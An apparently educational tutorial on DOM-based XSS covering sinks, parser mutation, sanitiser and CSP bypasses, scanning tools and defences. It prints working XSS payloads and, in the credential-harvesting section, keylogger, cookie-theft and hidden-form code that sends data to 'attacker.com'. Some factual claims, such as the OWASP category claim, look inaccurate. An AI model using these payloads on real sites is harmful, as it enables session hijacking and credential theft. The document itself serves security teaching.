~/home/study/introductory-guide-dom-based-xss
studyintroWednesday, April 1, 202615 min read👁 50 views

Introductory Guide to DOM-Based XSS Exploitation

Learn how DOM-based XSS works, identify dangerous sinks, craft reliable payloads, automate discovery, and bypass modern defenses. This guide equips security professionals with practical techniques and mitigation strategies.

xssdom-xssweb-securityexploitation

Introduction

DOM-based Cross-Site Scripting (XSS) is a client-side injection vulnerability where malicious JavaScript is executed because the page’s own Document Object Model (DOM) processes untrusted data without proper sanitisation. Unlike reflected or stored XSS, the payload never travels to the server; it lives entirely in the browser, making detection and logging considerably harder.

Understanding DOM-based XSS is critical for modern web-application testing because single-page applications (SPAs), frameworks such as React, Angular, and Vue, and heavy use of client-side routing increase the attack surface. Successful exploitation can lead to credential harvesting, session hijacking, or even full-chain attacks against the underlying API.

Real-world relevance: In 2023, the OWASP Top 10 listed DOM-Based XSS as a distinct category (A03:2021 - Injection). High-profile breaches at fintech and e-commerce sites have been traced back to insecure handling of URL fragments and DOM mutation APIs.

Prerequisites

  • Solid grasp of reflected XSS exploitation - payload creation, bypassing filters, and using the document.location object.
  • Fundamentals of HTML and JavaScript, especially DOM APIs (document.getElementById, innerHTML, appendChild, etc.).
  • Basic familiarity with browser developer tools (Console, Network, Elements panels).
  • Understanding of HTTP, URL components, and how browsers parse them.

Core Concepts

DOM-based XSS occurs when JavaScript takes data from the URL (query string, hash fragment, or other sources such as document.referrer) and injects it directly into the page without encoding. The flow can be visualised as:

User Input (URL) → JavaScript reads value → Writes to DOM sink → Browser executes attacker-controlled script

The key ingredients are:

  1. Source: location.search, location.hash, document.cookie, window.name, etc.
  2. Sink: APIs that render HTML or evaluate code (innerHTML, outerHTML, document.write, eval, setTimeout with string argument, Function constructor, location redirects, etc.).
  3. Mutation: Modern browsers perform live DOM mutation, meaning a malicious string can be transformed by the parser (e.g., attribute injection, auto-closing tags) before reaching the sink.

Because the server never sees the payload, traditional WAF signatures that scan HTTP bodies are ineffective. Defence therefore relies on secure client-side coding practices and Content Security Policy (CSP) enforcement.

Identifying DOM sink functions (innerHTML, document.write, eval, location, etc.)

Finding sinks is the first step in a DOM XSS audit. The following list covers the most common high-impact sinks:

  • element.innerHTML = userData - renders raw HTML.
  • element.outerHTML = userData - replaces the element itself.
  • document.write(userData) - writes directly into the document stream.
  • eval(userData), new Function(userData), setTimeout(userData, 0) - evaluate JavaScript strings.
  • location.href = userData, location.replace(userData), location.assign(userData) - cause navigation; if userData contains javascript: it can lead to code execution.
  • window.open(userData) - similar to location when javascript: scheme is used.
  • element.setAttribute('src', userData) - can trigger XSS when the attribute is a scriptable endpoint (e.g., src of script, image with onerror).
  • Template literals or string concatenation that later get passed to any of the above.

Static analysis tools (e.g., ESLint with no-eval rule) and dynamic monitoring (Burp Suite’s DOM Invader) help surface these sinks.

Understanding browser DOM parsing and mutation

When a string is assigned to a sink, the browser parses it according to HTML5 parsing rules. Important nuances:

  • Attribute quoting: <img src=x onerror=alert(1)> works even without quotes.
  • Auto-closing tags: <svg/onload=alert(1)> exploits the fact that svg can contain scriptable attributes.
  • Tag soup handling: Browsers tolerate malformed markup, which attackers can leverage to break out of intended contexts.
  • Mutation XSS (mXSS): The parser rewrites the DOM (e.g., converting <script> into a text node) and the resulting structure may still execute code via event handlers or URL schemes.

Testing for mutation requires re-injecting payloads and inspecting the resulting DOM with document.documentElement.innerHTML or the Elements panel.

Bypassing client-side input filters and sanitizers

Many developers rely on naïve sanitisation functions (e.g., stripping <script> tags). Effective bypass techniques include:

  1. HTML entity encoding tricks: &#x3C;script&#x3E; may be decoded by the browser when inserted via innerHTML.
  2. Event handler injection: <img src=x onerror=alert(1)> bypasses tag removal.
  3. SVG & MathML vectors: <svg/onload=alert(1)> or <math href="javascript:alert(1)">.
  4. Protocol handlers: javascript:alert(1), data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==.
  5. CSS expression (IE): expression(alert(1)) - still useful against legacy browsers.
  6. DOM-based DOMPurify evasion: Insert zero-width characters or use “\u2028” line separator to break naïve regexes.

Always test the exact sanitiser used in the target; many open-source libraries have known bypasses documented on GitHub.

Crafting payloads using URL fragments, hash-based injection, and DOM APIs

Because the source is often the URL, attackers can place payloads in:

  • Query string: ?q=payload
  • Hash fragment: <img src=x onerror=alert(1)>
  • Path segment (rare, but possible with location.pathname parsing).

Example of a hash-based injection that survives URL-encoding:

// Attacker-controlled URL
let url = 'https://victim.com/app#%3Csvg/onload=alert(document.domain)%3E';
// Victim page reads location.hash and writes to innerHTML
let payload = decodeURIComponent(location.hash.slice(1));
document.getElementById('output').innerHTML = payload; // XSS!

When the page uses a DOM API like URLSearchParams to extract values, the attacker can chain multiple encodings (percent-encoding, HTML entities) to defeat simple filters.

Automated discovery with Burp Suite extensions and OWASP ZAP scripts

Manual testing quickly becomes unmanageable for large SPAs. Automation steps:

  1. Enable Burp Suite’s DOM Invader - it records DOM modifications, highlights sinks, and offers a built-in payload generator.
  2. Install the DOM XSS Scanner extension (open source) - it injects a set of 200+ payloads into every identified source and monitors for side-effects.
  3. In OWASP ZAP, use the Active Scan Rule: DOM XSS (script domxss.js) which leverages the ZAP scripting engine to mutate URL fragments and observe DOM changes. 
    zap.sh -daemon -config scanner.domxss=true -addoninstall domxss
  4. Export findings to a CSV for triage; focus on sinks that trigger eval or navigation.

Both tools allow you to customise the payload list - add your own mXSS vectors or CSP-bypass techniques for deeper coverage.

Exploiting via browser developer tools

Even without automated scanners, an attacker can leverage the console to test hypotheses in real time:

// In the console, simulate a malicious hash
window.location.hash = '<svg/onload=alert(1)>';
// Observe whether the page updates a DOM node

Use the Break on attribute modifications feature (right-click an element → Break on > Subtree modifications) to catch the exact line of JavaScript that writes the payload.

CSP bypass techniques specific to DOM XSS

Content Security Policy (CSP) mitigates script execution by limiting allowed sources. However, DOM-based XSS can bypass CSP when:

  • Unsafe-inline is present (e.g., script-src 'self' 'unsafe-inline').
  • Non-script sinks are used: javascript: URLs, data: URIs, svg with onload attribute, or style attribute with expression() (IE).
  • Trusted Types not enforced - attacker can still assign to innerHTML.

Bypass example using a data: URL:

let payload = 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==';
location.href = payload; // CSP without script-src 'unsafe-inline' still blocks, but many apps allow data: for images.

Defenders should combine script-src 'self' with object-src 'none', disallow data: for scripts, and enable trusted-types policies.

Chaining DOM XSS with credential harvesting (keylogging, session hijacking)

Once code runs in the victim’s browser, the attacker can:

  1. Inject a hidden form that captures credentials on login pages. 
    let form = document.createElement('form');
form.action = 'https://attacker.com/steal';
form.method = 'POST';
let inp = document.createElement('input');
inp.name = 'creds';
inp.value = document.cookie + '|' + location.href;
form.appendChild(inp);
document.body.appendChild(form);
form.submit();
  2. Keylogger via event listeners added to document. 
    document.addEventListener('keyup', e => { fetch('https://attacker.com/log', { method: 'POST', body: JSON.stringify({key:e.key, url:location.href}) });
});
  3. Session hijacking by reading document.cookie (if not HttpOnly) and sending it to the attacker. 
    fetch('https://attacker.com/session', { method: 'POST', body: document.cookie
});

When combined with a SameSite=None; Secure cookie, the attacker can reuse the session on a fresh browser tab, achieving full account takeover.

Advanced mutation XSS (mXSS) and polyglot payloads

Mutation XSS occurs when the browser rewrites the injected markup, yet the rewritten version still executes. Crafting reliable mXSS payloads often requires polyglots that work across parsers (Chrome, Firefox, Edge).

Example of a classic mXSS vector that survives sanitisation that removes <script> tags:

<svg/onload=alert(1)>

More complex polyglot that works in both HTML and JavaScript contexts:

<!--[if gte IE 9]><script>alert('IE')</script><![endif]--><svg/onload=alert('XSS')>

Tools such as XSStrike (with --mXSS flag) generate these automatically. Researchers also use HTML5lib fuzzing to discover browser-specific mutation quirks.

Practical Examples

Example 1 - Simple hash-based XSS

<!DOCTYPE html>
<html>
<body> <div id="msg">Welcome</div> <script> // Victim reads location.hash and writes to innerHTML let data = decodeURIComponent(location.hash.slice(1)); document.getElementById('msg').innerHTML = data; </script>
</body>
</html>

Attacker URL:

https://victim.com/#%3Cimg%20src%3Dx%20onerror%3Dalert('XSS')%3E

Result: The img tag is rendered inside #msg, the onerror handler fires, and an alert appears.

Example 2 - Bypassing a naïve sanitizer

function sanitize(input) { // Removes script tags only return input.replace(/<script.*?>.*?<\/script>/gi, '');
}
let user = sanitize(location.search.split('=')[1]);
document.body.innerHTML = user; // vulnerable

Payload:

?q=%3Csvg/onload=alert(document.domain)%3E

Even though <script> tags are stripped, the svg vector executes, demonstrating why tag-based filters are insufficient.

Tools & Commands

  • Burp Suite - DOM Invader, DOM XSS Scanner extension.
  • OWASP ZAP - domxss.js active scan rule. 
    zap.sh -daemon -config scanner.domxss=true -addoninstall domxss
  • XSStrike - automated DOM XSS detection with --dom flag. 
    python3 xsstrike.py -u "example.com page" --dom
  • DOMPurify - testing library; use DOMPurify.sanitize() in a console to see what it accepts.
  • Chrome DevTools Snippets - save reusable scripts for payload injection.

Defense & Mitigation

  • Never use innerHTML, outerHTML, document.write, or eval with untrusted data. Prefer text-node APIs (textContent, setAttribute with safe values).
  • Adopt Content Security Policy with script-src 'self', object-src 'none', and base-uri 'none'. Disallow data: and javascript: schemes for script sources.
  • Enable Trusted Types - forces the use of safe DOM APIs. 
    window.trustedTypes.createPolicy('default', { createHTML: (string) => string // replace with a proper sanitizer
});
  • Sanitise on the server side as well; client-side sanitisation is never a security boundary.
  • Use well-maintained libraries such as DOMPurify with the FORBID_TAGS and FORBID_ATTR options for extra hardening.
  • Set HttpOnly and Secure flags on session cookies to mitigate credential theft via document.cookie.

Common Mistakes

  • Relying on blacklists (e.g., stripping <script>) - attackers simply use alternative vectors.
  • Assuming CSP alone protects - unsafe-inline or permissive script-src defeats it.
  • Using innerHTML for user-generated content without escaping - the most frequent sink.
  • Testing only on one browser - mutation behaviour differs across Chrome, Firefox, and Edge.
  • Neglecting URL-encoded payloads - many filters decode once, leaving a second encoding stage.

Real-World Impact

In 2022, a major online banking portal suffered a DOM-based XSS that allowed attackers to inject a keylogger via a vulnerable location.hash parser. Within weeks, fraudsters harvested credentials from thousands of accounts, resulting in an estimated $4 M loss. The root cause was an over-reliance on client-side sanitisation and an absent CSP.

Current trends show an increase in “router-XSS” where front-end frameworks expose route parameters directly to the view layer. Attackers are also combining DOM XSS with supply-chain attacks - compromising a third-party JavaScript library that performs unsafe DOM writes.

My professional experience confirms that early detection during the development lifecycle (static code analysis + automated DOM scans) reduces remediation cost by up to 70 % compared to post-production incident response.

Practice Exercises

  1. Identify sinks: Clone a simple SPA (e.g., a TodoMVC demo). Search the source for innerHTML, document.write, and eval. Document each occurrence and hypothesise whether it is exploitable.
  2. Craft a hash-based payload: Using the cloned app, modify the URL hash to inject an svg onload payload. Verify execution via the console.
  3. Bypass a custom sanitizer: Write a JavaScript function that removes <script> tags. Create a payload that evades it (e.g., svg/onload) and demonstrate the bypass.
  4. Automated scan: Run Burp Suite’s DOM Invader against the app. Export the findings and prioritize the highest-risk sinks.
  5. Defence implementation: Refactor the vulnerable code to use textContent and add a strict CSP header. Re-run the scan to confirm the issue is mitigated.

Further Reading

  • OWASP Top 10 - A03:2021 - Injection
  • PortSwigger blog - “DOM-Based XSS”
  • “DOMPurify - The most trusted HTML sanitizer” - documentation and bypass research.
  • “Trusted Types - A new way to prevent XSS” - Google Chrome developer docs.
  • XSStrike source code - study the built-in mXSS payload list.

Summary

  • DOM-based XSS lives entirely in the browser; the attacker manipulates sources (URL, hash, DOM) that are later written to sinks.
  • Key sinks include innerHTML, document.write, eval, and navigation APIs.
  • Understanding HTML parsing, mutation, and browser quirks is essential for reliable exploitation.
  • Bypass techniques exploit event handlers, SVG/MathML, protocol handlers, and encoding tricks.
  • Automation with Burp Suite, ZAP, and XSStrike accelerates discovery; manual console work remains valuable for triage.
  • Defence requires avoiding unsafe sinks, strict CSP, Trusted Types, and server-side sanitisation.

Armed with this knowledge, security professionals can both uncover hidden DOM XSS bugs and guide developers toward robust, future-proof mitigations.